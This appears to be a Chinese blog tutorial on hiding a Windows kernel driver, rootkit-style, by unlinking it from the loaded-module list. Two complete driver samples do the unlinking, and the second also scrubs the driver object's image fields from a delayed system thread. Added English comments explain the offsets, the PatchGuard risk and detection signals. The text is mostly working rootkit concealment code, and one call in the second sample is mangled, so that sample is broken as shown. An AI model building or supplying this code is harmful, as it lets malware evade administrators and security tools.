本文介绍 [Rootkit] 驱动隐藏 - 断链。
注意：此方法会触发 PatchGuard（PG）。
代码参考 1
/*
 * Partial mirror of the (undocumented) loader data entry that
 * DRIVER_OBJECT.DriverSection points at: the LIST_ENTRY linking the driver
 * into the loaded-module list, seven fields this sample never reads, then
 * the module path and name.  The layout is assumed, not verified here, and
 * the ULONG-sized fields only line up on a 32-bit build -- TODO confirm
 * against the target kernel before trusting any of these offsets.
 */
typedef struct _driverdata
{
    LIST_ENTRY listentry;   /* links this entry into the loaded-module list */
    ULONG unknown1;
    ULONG unknown2;
    ULONG unknown3;
    ULONG unknown4;
    ULONG unknown5;
    ULONG unknown6;
    ULONG unknown7;
    UNICODE_STRING path;
    UNICODE_STRING name;
}driverdata;

/* Unload routine: only logs (message text is Chinese, "driver unload"). */
VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{
    KdPrint(("驱动卸载\n"));
}

/*
 * Driver entry.  Reads the loader entry through a hard-coded byte offset
 * (20) into the DRIVER_OBJECT -- the DriverSection slot on 32-bit x86; the
 * ULONG casts truncate pointers on a 64-bit build, so this is 32-bit-only --
 * and splices that entry out of the doubly linked loaded-module list.
 * The page itself notes the technique trips PatchGuard.  Only the list
 * membership is removed: the DRIVER_OBJECT and the loader entry stay in
 * memory with their own Flink/Blink still pointing into the list, which is
 * what integrity checks and memory-forensic scans key on.
 *
 * qudongduixiang: driver object for this driver.
 * zhucebiao: registry path (unused).
 * Returns STATUS_SUCCESS unconditionally.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{
    KdPrint(("驱动入口开始\n"));   /* Chinese: "driver entry start" */
    driverdata *driverdata1 = NULL;
    /* Offset 20 is assumed to hold DriverSection; no DriverSection field access, so nothing type-checks this. */
    driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);
    if (driverdata1!=NULL)
    {
        /* Predecessor's Flink (first field of LIST_ENTRY, written through a ULONG cast) now skips this entry. */
        *(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;
        /* Successor's Blink now points back past this entry. */
        driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;
    }
    qudongduixiang->DriverUnload = xiezai1;
    return STATUS_SUCCESS;
}
代码参考 2
#include "ntddk.h"
/* Handle of the system thread created in DriverEntry; the thread closes it itself at the end of ThreadRun.  File-scope, so zero-initialised. */
HANDLE hThread;
/* Unload routine: only logs (message text is Chinese, "driver unloaded successfully").  Note DriverEntry below never installs it. */
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
    DbgPrint("驱动卸载成功\n");
}

/*
 * Body of the system thread started from DriverEntry with the DRIVER_OBJECT
 * as StartContext.  Waits ~3 s, then zeroes the module-describing fields of
 * the driver object (size, section, extension, start, init, fast-I/O and
 * StartIo pointers) and closes the global thread handle.  The delay
 * presumably lets DriverEntry return before the object is scrubbed -- the
 * page does not say.  Clearing DriverSection/DriverStart is itself a strong
 * anomaly signal: a live driver object whose image fields are NULL is not a
 * state the loader ever produces.
 */
VOID ThreadRun(PVOID StartContext)
{
    LARGE_INTEGER times;
    PDRIVER_OBJECT pDriverObject;
    /* Relative wait of 3 s: KeDelayExecutionThread takes 100-ns units, negative means relative. */
    times.QuadPart = -30 * 1000 * 1000;
    /* NOTE(review): the third argument below is mangled by the page's HTML rendering; the original text is not recoverable from here. */
    KeDelayExecutionThread(KernelMode, FALSE, ×);
    pDriverObject=(PDRIVER_OBJECT)StartContext;
    /* Scrub the module information held in the driver object. */
    pDriverObject->DriverSize = 0;
    pDriverObject->DriverSection = NULL;
    pDriverObject->DriverExtension = NULL;
    pDriverObject->DriverStart = NULL;
    pDriverObject->DriverInit = NULL;
    pDriverObject->FastIoDispatch = NULL;
    pDriverObject->DriverStartIo = NULL;
    ZwClose(hThread);
}

/*
 * Driver entry.  Takes the loader entry via the DriverSection field (no
 * hard-coded offset, unlike the first sample), splices it out of the
 * loaded-module list by pointing its neighbours at each other, then starts
 * ThreadRun to scrub the DRIVER_OBJECT.  The entry's own Flink/Blink are
 * left pointing into the list, the PsCreateSystemThread status is ignored,
 * DriverUnload is never assigned, and pReg is unused.  Returns 0
 * (STATUS_SUCCESS).
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pReg)
{
    PLIST_ENTRY pModuleList;
    pModuleList = pDriverObject->DriverSection;
    /* Previous module's Flink = this module's Flink. */
    pModuleList->Blink->Flink = pModuleList->Flink;
    /* Next module's Blink = this module's Blink. */
    pModuleList->Flink->Blink = pModuleList->Blink;
    PsCreateSystemThread(&hThread,GENERIC_ALL,NULL,NULL,NULL, ThreadRun, pDriverObject);
    return 0;
}